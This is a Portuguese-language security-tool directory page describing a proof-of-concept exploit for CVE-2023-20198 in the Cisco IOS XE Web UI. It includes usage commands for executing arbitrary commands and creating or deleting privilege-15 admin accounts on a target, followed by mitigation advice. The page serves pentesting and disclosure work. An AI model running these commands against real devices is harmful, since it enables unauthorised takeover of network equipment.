Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-20198-Exploit — Exploit de prova de conceito para CVE-2023-20198, uma vulnerabilidade de bypass de autenticação que afeta o Cisco IOS XE Web UI | Kitploit
Ferramentas/GitHubGitHub/gill-singh-a/cve-2023-20198-exploit
Autenticação e AutorizaçãoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e Controle
GitHubgill-singh-a/cve-2023-20198-exploit

CVE-2023-20198-Exploit

Exploit de prova de conceito para CVE-2023-20198, uma vulnerabilidade de bypass de autenticação que afeta o Cisco IOS XE Web UI

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 6 mesesAinda não revisado

Bypass de Autenticação no Cisco IOS XE (CVE-2023-20198)

Este repositório contém um exploit de prova de conceito para a CVE-2023-20198, uma vulnerabilidade de bypass de autenticação que afeta a Web UI do Cisco IOS XE.

A vulnerabilidade permite que atacantes não autenticados executem comandos arbitrários em dispositivos Cisco vulneráveis por meio de requisições SOAP maliciosas, podendo levar ao comprometimento total do dispositivo, incluindo execução remota de comandos e criação/exclusão de usuários administrativos.

Visão Geral da Vulnerabilidade

  • CVE: CVE-2023-20198

  • Produto Afetado: Cisco IOS XE (Web UI / Interface WSMA)

  • Impacto:

    • Bypass de autenticação
    • Execução remota de comandos (RCE)
    • Criação não autorizada de usuários
    • Exclusão não autorizada de usuários
  • Vetor de Ataque: Rede (HTTP/HTTPS)

  • Privilégios Necessários: Nenhum (não autenticado)

Essa vulnerabilidade é causada pelo tratamento inadequado de autenticação no endpoint do Web Services Management Agent (WSMA), permitindo que atacantes contornem a autenticação usando requisições HTTP maliciosas.

Requisitos

  • Python 3.x
  • requests
  • colorama

Instale as dependências:

root@kitploit:~
pip install -r requirements.txt

Uso

root@kitploit:~
usage: main.py [-h] -t TARGET [-c] [-C CMD] [-a] [-d] [-u USERNAME] [-p PASSWORD]

Authentication Bypass Exploit for Cisco IOS XE Devices (CVE-2023-20198)

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        Target Cisco IOS XE Device
  -c, --check           Check if the Target is vulnerable to CVE-2023-20198
  -C CMD, --cmd CMD     Cisco IOS XE Command to Execute
  -a, --add             Add New Username and Password
  -d, --delete          Delete existing User
  -u USERNAME, --username USERNAME
                        Username for Account Creation
  -p PASSWORD, --password PASSWORD
                        Password for Account Creation (Random Password Generated if not Provided)

Uso

Opções de Linha de Comando

Verificação de Vulnerabilidade

Verifique se o alvo é vulnerável:

root@kitploit:~
python3 exploit.py -t https://<TARGET-IP> -c

Verificação de Vulnerabilidade

Se vulnerável, a ferramenta detectará automaticamente o endpoint WSMA explorável e exibirá detalhes do dispositivo.

Execução Remota de Comandos

Execute comandos no dispositivo vulnerável:

root@kitploit:~
python3 exploit.py -t https://<TARGET-IP> -C "<COMMAND>"

Exemplo:

root@kitploit:~
python3 exploit.py -t https://<TARGET-IP> -C "show running | include username"

Exploração

Adicionar Usuário Administrativo

Crie um novo usuário administrador com privilégio 15:

root@kitploit:~
python3 exploit.py -t https://<TARGET-IP> -a -u cisco -p kaptaan

Criação de Conta

Se nenhuma senha for fornecida, o script gera uma senha segura aleatória automaticamente.

Acessando a Interface Web

Com a conta recém-criada, você pode acessar a Interface Web do dispositivo

Interface Web

Excluir Usuário Existente

Exclua um usuário existente:

root@kitploit:~
python3 exploit.py -t https://<TARGET-IP> -d -u cisco

Exclusão de Conta

Detecção e Mitigação

  • Atualize o Cisco IOS XE para a versão corrigida mais recente

  • Desative a Interface Web se não for necessária:

    root@kitploit:~
    no ip http server
    no ip http secure-server
    
  • Restrinja o acesso de gerenciamento por meio de ACLs

Referências

  • Comunicado da Cisco — CVE-2023-20198
  • NVD: CVE-2023-20198
  • Documentação do Cisco IOS XE WSMA
  • Relatórios da Comunidade de Pesquisa em Segurança
Baixar ferramenta
OpçãoDescrição
-t, --targetDispositivo Cisco IOS XE alvo (Obrigatório)
-c, --checkVerifica se o alvo é vulnerável
-C, --cmdExecuta um comando Cisco IOS XE
-a, --addAdiciona um novo usuário administrativo
-d, --deleteExclui um usuário existente
-u, --usernameNome de usuário para criação/exclusão de conta
-p, --passwordSenha para nova conta (aleatória se não for fornecida)